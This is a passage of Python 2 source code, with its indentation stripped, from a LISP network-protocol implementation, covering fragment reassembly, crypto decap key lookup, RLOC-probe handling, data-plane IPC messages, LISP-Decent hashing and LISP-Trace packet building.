if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format.
#
entry = { "type" : "interfaces", "interfaces" : [] }
for interface in lisp_myinterfaces.values():
if (interface.instance_id == None): continue
record = { "interface" : interface.device,
"instance-id" : str(interface.instance_id) }
entry["interfaces"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_parse_auth_key
#
# Look for values for "authentication-key" in the various forms of:
#
# <password>
# [<key-id>]<password>
# [<key-id>]<password> [<key-id>]<password> [<key-id>]<password>
#
# Return a auth_key{} where the keys from the dictionary array are type
# integers and the values are type string.
#
def lisp_parse_auth_key(value):
values = value.split("[")
auth_key = {}
if (len(values) == 1):
auth_key[0] = value
return(auth_key)
#endif
for v in values:
if (v == ""): continue
index = v.find("]")
key_id = v[0:index]
try: key_id = int(key_id)
except: return
auth_key[key_id] = v[index+1::]
#endfor
return(auth_key)
#enddef
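#
# Examples of the three accepted forms:
#
#   lisp_parse_auth_key("secret")       returns {0: "secret"}
#   lisp_parse_auth_key("[3]secret")    returns {3: "secret"}
#   lisp_parse_auth_key("[1]foo[2]bar") returns {1: "foo", 2: "bar"}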
#
# lisp_reassemble
#
# Reassemble an IPv4 datagram. The result is a LISP encapsulated packet.
#
# An entry in the queue is a multi-tuple of:
#
# <frag-offset>, <frag-length>, <packet-with-header>, <last-frag-is-true>
#
# When it is not a LISP/VXLAN encapsulated packet, the multi-tuple will be
# for the first fragment:
#
# <frag-offset>, <frag-length>, None, <last-frag-is-true>
#
def lisp_reassemble(packet):
fo = socket.ntohs(struct.unpack("H", packet[6:8])[0])
#
# Not a fragment, return packet and process.
#
if (fo == 0 or fo == 0x4000): return(packet)
#
# Get key fields from fragment.
#
ident = socket.ntohs(struct.unpack("H", packet[4:6])[0])
fl = socket.ntohs(struct.unpack("H", packet[2:4])[0])
last_frag = (fo & 0x2000 == 0 and (fo & 0x1fff) != 0)
entry = [(fo & 0x1fff) * 8, fl - 20, packet, last_frag]
#
# If first fragment, check to see if LISP packet. Do not reassemble if
# source or destination port is not 4341, 8472 or 4789. But add this to
# the queue so when other fragments come in, we know to not queue them.
# If other fragments came in before the first fragment, remove them from
# the queue.
#
if (fo == 0x2000):
sport, dport = struct.unpack("HH", packet[20:24])
sport = socket.ntohs(sport)
dport = socket.ntohs(dport)
if (dport not in [4341, 8472, 4789] and sport != 4341):
lisp_reassembly_queue[ident] = []
entry[2] = None
#endif
#endif
#
# Initialize list if first fragment. Indexed by IPv4 Ident.
#
if (lisp_reassembly_queue.has_key(ident) == False):
lisp_reassembly_queue[ident] = []
#endif
#
# Get fragment queue based on IPv4 Ident.
#
queue = lisp_reassembly_queue[ident]
#
# Do not queue fragment if the first fragment arrived and we determined
# it's not a LISP encapsulated packet.
#
if (len(queue) == 1 and queue[0][2] == None):
dprint("Drop non-LISP encapsulated fragment 0x{}".format( \
lisp_hex_string(ident).zfill(4)))
return(None)
#endif
#
# Insert in sorted order.
#
queue.append(entry)
queue = sorted(queue)
#
# Print addresses.
#
addr = lisp_address(LISP_AFI_IPV4, "", 32, 0)
addr.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
src = addr.print_address_no_iid()
addr.address = socket.ntohl(struct.unpack("I", packet[16:20])[0])
dst = addr.print_address_no_iid()
addr = red("{} -> {}".format(src, dst), False)
dprint("{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}".format( \
bold("Received", False), " non-LISP encapsulated" if \
entry[2] == None else "", addr, lisp_hex_string(ident).zfill(4),
lisp_hex_string(fo).zfill(4)))
#
# Check if all fragments arrived. First check if first and last fragments
# are in queue.
#
if (queue[0][0] != 0 or queue[-1][3] == False): return(None)
last_entry = queue[0]
for frag in queue[1::]:
fo = frag[0]
last_fo, last_fl = last_entry[0], last_entry[1]
if (last_fo + last_fl != fo): return(None)
last_entry = frag
#endfor
lisp_reassembly_queue.pop(ident)
#
# If we did not return, we have all fragments. Now append them. Keep the
# IP header in the first fragment but remove it from each subsequent fragment.
#
packet = queue[0][2]
for frag in queue[1::]: packet += frag[2][20::]
dprint("{} fragments arrived for packet 0x{}, length {}".format( \
bold("All", False), lisp_hex_string(ident).zfill(4), len(packet)))
#
# Fix length and frag-offset field before returning and fixup checksum.
#
length = socket.htons(len(packet))
header = packet[0:2] + struct.pack("H", length) + packet[4:6] + \
struct.pack("H", 0) + packet[8:10] + struct.pack("H", 0) + \
packet[12:20]
header = lisp_ip_checksum(header)
return(header + packet[20::])
#enddef
#
# lisp_get_crypto_decap_lookup_key
#
# Return None if we cannot find <addr>:<port> or <addr>:0 in lisp_crypto_
# keys_by_rloc_decap{}.
#
def lisp_get_crypto_decap_lookup_key(addr, port):
addr_str = addr.print_address_no_iid() + ":" + str(port)
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
addr_str = addr.print_address_no_iid()
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
#
# We are at a non-NAT based xTR. We need to get the keys from an RTR
# or another non-NAT based xTR. Move addr+port to addr.
#
for ap in lisp_crypto_keys_by_rloc_decap:
a = ap.split(":")
if (len(a) == 1): continue
a = a[0] if len(a) == 2 else ":".join(a[0:-1])
if (a == addr_str):
keys = lisp_crypto_keys_by_rloc_decap[ap]
lisp_crypto_keys_by_rloc_decap[addr_str] = keys
return(addr_str)
#endif
#endfor
return(None)
#enddef
#
# lisp_build_crypto_decap_lookup_key
#
# Decide to return <addr>:<port> or <addr> depending if the RLOC is behind
# a NAT. This is used on the RTR. Check the lisp probing cache. If we find
# an RLOC with a port number stored, then it is behind a NAT. Otherwise,
# the supplied port is not relevant and we want to create a "port-less" decap
# entry for an xTR that is in public address space.
#
def lisp_build_crypto_decap_lookup_key(addr, port):
addr = addr.print_address_no_iid()
addr_and_port = addr + ":" + str(port)
if (lisp_i_am_rtr):
if (lisp_rloc_probe_list.has_key(addr)): return(addr)
#
# Have to check NAT cache to see if RLOC is translated. If not, this
# is an xTR in public space. We'll have to change this in the future
# so we don't do a full table traversal. But this only happens for
# RLOCs we have no probe state for.
#
for nat_info in lisp_nat_state_info.values():
for nat in nat_info:
if (addr == nat.address): return(addr_and_port)
#endfor
#endif
return(addr)
#endif
return(addr_and_port)
#enddef
#
# lisp_set_ttl
#
# Set send IP TTL for outgoing packet.
#
def lisp_set_ttl(lisp_socket, ttl):
try:
lisp_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
except:
lprint("socket.setsockopt(IP_TTL) not supported")
pass
#endtry
return
#enddef
#
# lisp_is_rloc_probe_request
#
# Pass LISP first byte to test for 0x12, a Map-Request RLOC-probe.
#
def lisp_is_rloc_probe_request(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x12)
#enddef
#
# lisp_is_rloc_probe_reply
#
# Pass LISP first byte to test for 0x28, a Map-Reply RLOC-probe.
#
def lisp_is_rloc_probe_reply(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x28)
#enddef
#
# lisp_is_rloc_probe
#
# If this is a RLOC-probe received by the data-plane (from a pcap filter),
# then return source address, source port, ttl, and position packet to the
# beginning of the LISP header. The packet pointer entering this function is
# the beginning of an IPv4 header.
#
# If rr (request-or-reply) is:
#
# 0: Check for Map-Request RLOC-probe (ETR case)
# 1: Check for Map-Reply RLOC-probe (ITR case)
# -1: Check for either (RTR case)
#
# Return packet pointer untouched if not an RLOC-probe. If it is an RLOC-probe
# request or reply from ourselves, return packet pointer None and source None.
#
def lisp_is_rloc_probe(packet, rr):
udp = (struct.unpack("B", packet[9])[0] == 17)
if (udp == False): return([packet, None, None, None])
sport = struct.unpack("H", packet[20:22])[0]
dport = struct.unpack("H", packet[22:24])[0]
is_lisp = (socket.htons(LISP_CTRL_PORT) in [sport, dport])
if (is_lisp == False): return([packet, None, None, None])
if (rr == 0):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == 1):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == -1):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
#endif
#endif
#
# Get source address, source port, and TTL. Decrement TTL.
#
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
#
# If this is a RLOC-probe from ourselves, drop.
#
if (source.is_local()): return([None, None, None, None])
#
# Accept, and return source, port, and ttl to caller.
#
source = source.print_address_no_iid()
port = socket.ntohs(struct.unpack("H", packet[20:22])[0])
ttl = struct.unpack("B", packet[8])[0] - 1
packet = packet[28::]
r = bold("Receive(pcap)", False)
f = bold("from " + source, False)
p = lisp_format_packet(packet)
lprint("{} {} bytes {} {}, packet: {}".format(r, len(packet), f, port, p))
return([packet, source, port, ttl])
#enddef
#
# lisp_ipc_write_xtr_parameters
#
# When an external data-plane is running, write the following parameters
# to it:
#
# ipc = { "type" : "xtr-parameters", "control-plane-logging" : False,
# "data-plane-logging" : False, "rtr" : False }
#
def lisp_ipc_write_xtr_parameters(cp, dp):
if (lisp_ipc_dp_socket == None): return
ipc = { "type" : "xtr-parameters", "control-plane-logging" : cp,
"data-plane-logging" : dp, "rtr" : lisp_i_am_rtr }
lisp_write_to_dp_socket(ipc)
return
#enddef
#
# lisp_external_data_plane
#
# Return True if an external data-plane is running. That means that "ipc-data-
# plane = yes" is configured or the lisp-xtr go binary is running.
#
def lisp_external_data_plane():
cmd = 'egrep "ipc-data-plane = yes" ./lisp.config'
if (commands.getoutput(cmd) != ""): return(True)
if (os.getenv("LISP_RUN_LISP_XTR") != None): return(True)
return(False)
#enddef
#
# lisp_process_data_plane_restart
#
# The external data-plane has restarted. We will touch the lisp.config file so
# all configuration information is sent and then traverse the map-cache
# sending each entry to the data-plane so it can regain its state.
#
# This function will also clear the external data-plane map-cache when a user
# clears the map-cache in the lisp-itr or lisp-rtr process.
#
# { "type" : "restart" }
#
def lisp_process_data_plane_restart(do_clear=False):
os.system("touch ./lisp.config")
jdata = { "type" : "entire-map-cache", "entries" : [] }
if (do_clear == False):
entries = jdata["entries"]
lisp_map_cache.walk_cache(lisp_ipc_walk_map_cache, entries)
#endif
lisp_write_to_dp_socket(jdata)
return
#enddef
#
# lisp_process_data_plane_stats
#
# { "type" : "statistics", "entries" :
# [ { "instance-id" : "<iid>", "eid-prefix" : "<eid>", "rlocs" : [
# { "rloc" : "<rloc-1>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : "<timestamp>" }, ...
# { "rloc" : "<rloc-n>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <system-uptime> } ], ... }
# ]
# }
#
def lisp_process_data_plane_stats(msg, lisp_sockets, lisp_port):
if (msg.has_key("entries") == False):
lprint("No 'entries' in stats IPC message")
return
#endif
if (type(msg["entries"]) != list):
lprint("'entries' in stats IPC message must be an array")
return
#endif
for msg in msg["entries"]:
if (msg.has_key("eid-prefix") == False):
lprint("No 'eid-prefix' in stats IPC message")
continue
#endif
eid_str = msg["eid-prefix"]
if (msg.has_key("instance-id") == False):
lprint("No 'instance-id' in stats IPC message")
continue
#endif
iid = int(msg["instance-id"])
#
# Lookup EID-prefix in map-cache.
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(eid_str)
mc = lisp_map_cache_lookup(None, eid)
if (mc == None):
lprint("Map-cache entry for {} not found for stats update". \
format(eid_str))
continue
#endif
if (msg.has_key("rlocs") == False):
lprint("No 'rlocs' in stats IPC message for {}".format( \
eid_str))
continue
#endif
if (type(msg["rlocs"]) != list):
lprint("'rlocs' in stats IPC message must be an array")
continue
#endif
ipc_rlocs = msg["rlocs"]
#
# Loop through RLOCs in IPC message.
#
for ipc_rloc in ipc_rlocs:
if (ipc_rloc.has_key("rloc") == False): continue
rloc_str = ipc_rloc["rloc"]
if (rloc_str == "no-address"): continue
rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
rloc.store_address(rloc_str)
rloc_entry = mc.get_rloc(rloc)
if (rloc_entry == None): continue
#
# Update stats.
#
pc = 0 if ipc_rloc.has_key("packet-count") == False else \
ipc_rloc["packet-count"]
bc = 0 if ipc_rloc.has_key("byte-count") == False else \
ipc_rloc["byte-count"]
ts = 0 if ipc_rloc.has_key("seconds-last-packet") == False else \
ipc_rloc["seconds-last-packet"]
rloc_entry.stats.packet_count += pc
rloc_entry.stats.byte_count += bc
rloc_entry.stats.last_increment = lisp_get_timestamp() - ts
lprint("Update stats {}/{}/{}s for {} RLOC {}".format(pc, bc,
ts, eid_str, rloc_str))
#endfor
#
# Check if this map-cache entry needs refreshing.
#
if (mc.group.is_null() and mc.has_ttl_elapsed()):
eid_str = green(mc.print_eid_tuple(), False)
lprint("Refresh map-cache entry {}".format(eid_str))
lisp_send_map_request(lisp_sockets, lisp_port, None, mc.eid, None)
#endif
#endfor
return
#enddef
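#
# A minimal hypothetical "statistics" IPC message this function accepts:
#
#   { "type" : "statistics", "entries" : [
#     { "instance-id" : "1000", "eid-prefix" : "10.0.0.0/8", "rlocs" : [
#       { "rloc" : "192.0.2.1", "packet-count" : 10, "byte-count" : 1400,
#         "seconds-last-packet" : 2 } ] } ] }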
#
# lisp_process_data_plane_decap_stats
#
# { "type" : "decap-statistics",
# "no-decrypt-key" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "outer-header-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "bad-inner-version" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "good-packets" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "ICV-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "checksum-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> }
# }
#
# If we are an RTR, we can process the stats directly. If we are an ITR, we
# need to send an IPC message to the lisp-etr process.
#
def lisp_process_data_plane_decap_stats(msg, lisp_ipc_socket):
#
# Send IPC message to lisp-etr process. Variable 'msg' is a dict array.
# Needs to be passed in IPC message as a string.
#
if (lisp_i_am_itr):
lprint("Send decap-stats IPC message to lisp-etr process")
ipc = "stats%{}".format(json.dumps(msg))
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#endif
#
# Process stats counters in lisp-etr and lisp-rtr processes. Variable 'msg'
# is a dictionary array when the ITR/RTR is processing msg. When an ETR
# is processing it, it received a JSON string from the ITR so it needs
# to convert to a dictionary array.
#
ipc = bold("IPC", False)
lprint("Process decap-stats {} message: '{}'".format(ipc, msg))
if (lisp_i_am_etr): msg = json.loads(msg)
key_names = ["good-packets", "ICV-error", "checksum-error",
"lisp-header-error", "no-decrypt-key", "bad-inner-version",
"outer-header-error"]
for key_name in key_names:
pc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["packet-count"]
lisp_decap_stats[key_name].packet_count += pc
bc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["byte-count"]
lisp_decap_stats[key_name].byte_count += bc
ts = 0 if msg.has_key(key_name) == False else \
msg[key_name]["seconds-last-packet"]
lisp_decap_stats[key_name].last_increment = lisp_get_timestamp() - ts
#endfor
return
#enddef
#
# lisp_process_punt
#
# Another data-plane is punting a packet to us so we can discover a source
# EID, send a map-request, or store statistics data. The format of the JSON
# messages are typed "discovery", "restart", "statistics", and "decap-
# statistics". This function dispatches to helper functions for the stats
# and restart types, and itself processes the discovery logic for:
#
# { "type" : "discovery", "source-eid" : <eid-source-address>,
# "dest-eid" : <eid-dest-address>, "interface" : "<device-name>",
# "instance-id" : <iid> }
#
# And:
#
def lisp_process_punt(punt_socket, lisp_send_sockets, lisp_ephem_port):
message, source = punt_socket.recvfrom(4000)
msg = json.loads(message)
if (type(msg) != dict):
lprint("Invalid punt message from {}, not in JSON format". \
format(source))
return
#endif
punt = bold("Punt", False)
lprint("{} message from '{}': '{}'".format(punt, source, msg))
if (msg.has_key("type") == False):
lprint("Punt IPC message has no 'type' key")
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "statistics"):
lisp_process_data_plane_stats(msg, lisp_send_sockets, lisp_ephem_port)
return
#endif
if (msg["type"] == "decap-statistics"):
lisp_process_data_plane_decap_stats(msg, punt_socket)
return
#endif
#
# Process data-plane restart message.
#
if (msg["type"] == "restart"):
lisp_process_data_plane_restart()
return
#endif
#
# Process possible punt packet discovery message.
#
if (msg["type"] != "discovery"):
lprint("Punt IPC message has wrong format")
return
#endif
if (msg.has_key("interface") == False):
lprint("Invalid punt message from {}, required keys missing". \
format(source))
return
#endif
#
# Drop control-messages designated as instance-ID 0xffffff (or -1 in JSON).
#
device = msg["interface"]
if (device == ""):
iid = int(msg["instance-id"])
if (iid == -1): return
else:
iid = lisp_get_interface_instance_id(device, None)
#endif
#
# Validate EID format.
#
seid = None
if (msg.has_key("source-eid")):
source_eid = msg["source-eid"]
seid = lisp_address(LISP_AFI_NONE, source_eid, 0, iid)
if (seid.is_null()):
lprint("Invalid source-EID format '{}'".format(source_eid))
return
#endif
#endif
deid = None
if (msg.has_key("dest-eid")):
dest_eid = msg["dest-eid"]
deid = lisp_address(LISP_AFI_NONE, dest_eid, 0, iid)
if (deid.is_null()):
lprint("Invalid dest-EID format '{}'".format(dest_eid))
return
#endif
#endif
#
# Do source-EID discovery.
#
# Make sure we have a configured database-mapping entry for this EID.
#
if (seid):
e = green(seid.print_address(), False)
db = lisp_db_for_lookups.lookup_cache(seid, False)
if (db != None):
#
# Check accept policy and if accepted, discover EID by putting
# in discovery cache. ETR will register it.
#
if (db.dynamic_eid_configured()):
interface = lisp_allow_dynamic_eid(device, seid)
if (interface != None and lisp_i_am_itr):
lisp_itr_discover_eid(db, seid, device, interface)
else:
lprint(("Disallow dynamic source-EID {} " + \
"on interface {}").format(e, device))
#endif
#endif
else:
lprint("Punt from non-EID source {}".format(e))
#endif
#endif
#
# Do Map-Request processing on destination.
#
if (deid):
mc = lisp_map_cache_lookup(seid, deid)
if (mc == None or mc.action == LISP_SEND_MAP_REQUEST_ACTION):
#
# Check if we should rate-limit Map-Request and if not send
# Map-Request.
#
if (lisp_rate_limit_map_request(seid, deid)): return
lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
seid, deid, None)
else:
e = green(deid.print_address(), False)
lprint("Map-cache entry for {} already exists".format(e))
#endif
#endif
return
#enddef
#
# lisp_ipc_map_cache_entry
#
# Callback from class lisp_cache.walk_cache().
#
def lisp_ipc_map_cache_entry(mc, jdata):
entry = lisp_write_ipc_map_cache(True, mc, dont_send=True)
jdata.append(entry)
return([True, jdata])
#enddef
#
# lisp_ipc_walk_map_cache
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_ipc_walk_map_cache(mc, jdata):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_ipc_map_cache_entry(mc, jdata))
if (mc.source_cache == None): return([True, jdata])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
jdata = mc.source_cache.walk_cache(lisp_ipc_map_cache_entry, jdata)
return([True, jdata])
#enddef
#
# lisp_itr_discover_eid
#
# Put dynamic-EID in db.dynamic_eids{} array.
#
def lisp_itr_discover_eid(db, eid, input_interface, routed_interface,
lisp_ipc_listen_socket):
eid_str = eid.print_address()
if (db.dynamic_eids.has_key(eid_str)):
db.dynamic_eids[eid_str].last_packet = lisp_get_timestamp()
return
#endif
#
# Add to list.
#
dyn_eid = lisp_dynamic_eid()
dyn_eid.dynamic_eid.copy_address(eid)
dyn_eid.interface = routed_interface
dyn_eid.last_packet = lisp_get_timestamp()
dyn_eid.get_timeout(routed_interface)
db.dynamic_eids[eid_str] = dyn_eid
routed = ""
if (input_interface != routed_interface):
routed = ", routed-interface " + routed_interface
#endif
eid_string = green(eid_str, False) + bold(" discovered", False)
lprint("Dynamic-EID {} on interface {}{}, timeout {}".format( \
eid_string,input_interface, routed, dyn_eid.timeout))
#
# Tell ETR process so it can register dynamic-EID.
#
ipc = "learn%{}%{}".format(eid_str, routed_interface)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_listen_socket, "lisp-etr")
return
#enddef
#
# lisp_retry_decap_keys
#
# A decap-key was copied from x.x.x.x:p to x.x.x.x, but it was the wrong one.
# Copy x.x.x.x:q to x.x.x.x. This is an expensive function. But it is hardly
# used. And once it is used for a particular addr_str, it shouldn't be used
# again.
#
# This function is only used when an ICV error occurs when x.x.x.x is the
# crypto-key used.
#
def lisp_retry_decap_keys(addr_str, packet, iv, packet_icv):
if (lisp_search_decap_keys == False): return
#
# Only use this function when the key matched was not port based.
#
if (addr_str.find(":") != -1): return
parent = lisp_crypto_keys_by_rloc_decap[addr_str]
for key in lisp_crypto_keys_by_rloc_decap:
#
# Find entry that has same source RLOC.
#
if (key.find(addr_str) == -1): continue
#
# Skip over parent entry.
#
if (key == addr_str): continue
#
# If the crypto-keys are the same, go find the next one.
#
entry = lisp_crypto_keys_by_rloc_decap[key]
if (entry == parent): continue
#
# Try ICV check. If it passes, then switch to this key.
#
crypto_key = entry[1]
if (packet_icv != crypto_key.do_icv(packet, iv)):
lprint("Test ICV with key {} failed".format(red(key, False)))
continue
#endif
lprint("Changing decap crypto key to {}".format(red(key, False)))
lisp_crypto_keys_by_rloc_decap[addr_str] = entry
#endfor
return
#enddef
#
# lisp_decent_pull_xtr_configured
#
# Return True if configured LISP-Decent modulus is not 0. Meaning we are using
# the LISP-Decent pull-based mapping system.
#
def lisp_decent_pull_xtr_configured():
return(lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None)
#enddef
#
# lisp_is_decent_dns_suffix
#
# Return True if supplied DNS name ends with a configured LISP-Decent DNS
# suffix.
#
def lisp_is_decent_dns_suffix(dns_name):
if (lisp_decent_dns_suffix == None): return(False)
name = dns_name.split(".")
name = ".".join(name[1::])
return(name == lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_index
#
# Hash the EID-prefix and mod the configured LISP-Decent modulus value.
#
def lisp_get_decent_index(eid):
eid_str = eid.print_prefix()
hash_value = hashlib.sha256(eid_str).hexdigest()
index = int(hash_value, 16) % lisp_decent_modulus
return(index)
#enddef
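#
# A minimal worked example of the hash-and-mod scheme above (illustrative
# only; 'modulus' stands in for lisp_decent_modulus and the string argument
# for what eid.print_prefix() returns, on Python 2 as in this file):
#
def lisp_example_decent_index(eid_prefix_str, modulus):
    digest = hashlib.sha256(eid_prefix_str).hexdigest()
    return(int(digest, 16) % modulus)
#enddef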
#
# lisp_get_decent_dns_name
#
# Based on EID, get index and prepend to LISP-Decent DNS name suffix.
#
def lisp_get_decent_dns_name(eid):
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_dns_name_from_str
#
# The supplied EID is an address passed as a string. Build an internal
# lisp_address() to pass into lisp_get_decent_index().
#
def lisp_get_decent_dns_name_from_str(iid, eid_str):
eid = lisp_address(LISP_AFI_NONE, eid_str, 0, iid)
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_trace_append
#
# Append JSON data to trace packet. If this is the ETR, the EIDs will be
# swapped to return packet to originator.
#
# Returning False means the caller should return (and not forward the packet).
#
def lisp_trace_append(packet, reason=None, ed="encap", lisp_socket=None,
rloc_entry=None):
offset = 28 if packet.inner_version == 4 else 48
trace_pkt = packet.packet[offset::]
trace = lisp_trace()
if (trace.decode(trace_pkt) == False):
lprint("Could not decode JSON portion of a LISP-Trace packet")
return(False)
#endif
next_rloc = "?" if packet.outer_dest.is_null() else \
packet.outer_dest.print_address_no_iid()
#
# Display the port if the caller is an encapsulating RTR using a translated
# RLOC.
#
if (next_rloc != "?" and packet.encap_port != LISP_DATA_PORT):
if (ed == "encap"): next_rloc += ":{}".format(packet.encap_port)
#endif
#
# Add node entry data for the encapsulation or decapsulation.
#
entry = {}
entry["node"] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else \
"RTR" if lisp_i_am_rtr else "?"
srloc = packet.outer_source
if (srloc.is_null()): srloc = lisp_myrlocs[0]
entry["srloc"] = srloc.print_address_no_iid()
#
# In the source RLOC include the ephemeral port number of the ltr client
# so RTRs can return errors to the client behind a NAT.
#
if (entry["node"] == "ITR" and packet.inner_sport != LISP_TRACE_PORT):
entry["srloc"] += ":{}".format(packet.inner_sport)
#endif
entry["hn"] = lisp_hostname
key = ed + "-ts"
entry[key] = lisp_get_timestamp()
#
# If this is an ETR decap entry and the drloc is "?", the packet came in on
# lisp_etr_nat_data_plane() where the kernel strips the outer header. Get
# the local/private RLOC from our database-mapping.
#
if (next_rloc == "?" and entry["node"] == "ETR"):
db = lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db != None and len(db.rloc_set) >= 1):
next_rloc = db.rloc_set[0].rloc.print_address_no_iid()
#endif
#endif
entry["drloc"] = next_rloc
#
# If there is a reason there is no dest RLOC, include it.
#
if (next_rloc == "?" and reason != None):
entry["drloc"] += " ({})".format(reason)
#endif
#
# Add recent-rtts and recent-hops.
#
if (rloc_entry != None):
entry["rtts"] = rloc_entry.recent_rloc_probe_rtts
entry["hops"] = rloc_entry.recent_rloc_probe_hops
#endif
#
# Build seid->deid record if it does not exist. Then append node entry
# to record below, in the search loop.
#
seid = packet.inner_source.print_address()
deid = packet.inner_dest.print_address()
if (trace.packet_json == []):
rec = {}
rec["seid"] = seid
rec["deid"] = deid
rec["paths"] = []
trace.packet_json.append(rec)
#endif
#
# Search for record. If we are appending the first ITR node entry, get its
# RLOC address in case we have to return-to-sender.
#
for rec in trace.packet_json:
if (rec["deid"] != deid): continue
rec["paths"].append(entry)
break
#endfor
#
# If we are destination-EID, add a new record deid->seid if we have not
# completed a round-trip. The ETR will deliver this packet from its own
# EID which means the co-located ITR will pcap the packet and add its
# encap node entry.
#
swap = False
if (len(trace.packet_json) == 1 and entry["node"] == "ETR" and
trace.myeid(packet.inner_dest)):
rec = {}
rec["seid"] = deid
rec["deid"] = seid
rec["paths"] = []
trace.packet_json.append(rec)
swap = True
#endif
#
# Print the JSON packet after we appended data to it. Put the new JSON in
# packet. Fix up lengths and checksums from inner headers.
#
trace.print_trace()
trace_pkt = trace.encode()
#
# If next_rloc is not known, we need to return packet to sender.
#
# Otherwise we are forwarding a packet that is about to be encapsulated or we
# are forwarding a packet that was just decapsulated with the addresses
# swapped so we can turn it around.
#
sender_rloc = trace.packet_json[0]["paths"][0]["srloc"]
if (next_rloc == "?"):
lprint("LISP-Trace return to sender RLOC {}".format(sender_rloc))
trace.return_to_sender(lisp_socket, sender_rloc, trace_pkt)
return(False)
#endif
#
# Compute length of trace packet. This includes the UDP header, Trace
# header, and JSON payload.
#
udplen = trace.packet_length()
#
# Fix up UDP length and recompute UDP checksum if IPv6 packet, zero
# otherwise. Only do checksum when the Trace went round-trip and this is
# the local ETR delivery EID-based Trace packet to the client ltr.
#
headers = packet.packet[0:offset]
p = struct.pack("HH", socket.htons(udplen), 0)
headers = headers[0:offset-4] + p
if (packet.inner_version == 6 and entry["node"] == "ETR" and
len(trace.packet_json) == 2):
udp = headers[offset-8::] + trace_pkt
udp = lisp_udp_checksum(seid, deid, udp)
headers = headers[0:offset-8] + udp[0:8]
#endif
#
# If we are swapping addresses, do it here so the JSON append and IP
# header fields changes are all reflected in new IPv4 header checksum.
#
if (swap):
if (packet.inner_version == 4):
headers = headers[0:12] + headers[16:20] + headers[12:16] + \
headers[22:24] + headers[20:22] + headers[24::]
else:
headers = headers[0:8] + headers[24:40] + headers[8:24] + \
headers[42:44] + headers[40:42] + headers[44::]
#endif
d = packet.inner_dest
packet.inner_dest = packet.inner_source
packet.inner_source = d
#endif
#
# Fix up IP length.
#
offset = 2 if packet.inner_version == 4 else 4
iplen = 20 + udplen if packet.inner_version == 4 else udplen
h = struct.pack("H", socket.htons(iplen))
headers = headers[0:offset] + h + headers[offset+2::]
#
# Fix up IPv4 header checksum.
#
if (packet.inner_version == 4):
c = struct.pack("H", 0)
headers = headers[0:10] + c + headers[12::]
h = lisp_ip_checksum(headers[0:20])
headers = h + headers[20::]
#endif
#
# Caller is forwarding packet, either as an ITR, RTR, or ETR.
#
packet.packet = headers + trace_pkt
return(True)
#enddef
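#
# Sketch of the JSON carried in a LISP-Trace packet after an ITR and an ETR
# have each appended an entry. Field names come from the code above; the
# addresses, hostnames, and timestamps are invented for illustration:
#
# [ { "seid" : "[1000]10.1.1.1", "deid" : "[1000]10.2.2.2", "paths" : [
#     { "node" : "ITR", "srloc" : "1.1.1.1", "drloc" : "2.2.2.2",
#       "hn" : "itr-host", "encap-ts" : <ts>, "rtts" : [...], "hops" : [...] },
#     { "node" : "ETR", "srloc" : "2.2.2.2", "drloc" : "10.2.2.2",
#       "hn" : "etr-host", "decap-ts" : <ts> } ] } ]
#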
#
# lisp_allow_gleaning
#
# Check the lisp_glean_mappings array to see if we should glean the EID and
# RLOC. Find first match. Return False if there are no configured glean
# mappings. The second return value is either True or False depending if the
# matched entry was configured to RLOC-probe the RLOC for the gleaned entry.
#
def lisp_allow_gleaning(eid, group, rloc):
if (lisp_glean_mappings == []): return(False, False)
for entry in lisp_glean_mappings:
if (entry.has_key("instance-id")):
iid = eid.instance_id
low, high = entry["instance-id"]
if (iid < low or iid > high): continue
#endif
if (entry.has_key("eid-prefix")):
e = copy.deepcopy(entry["eid-prefix"])
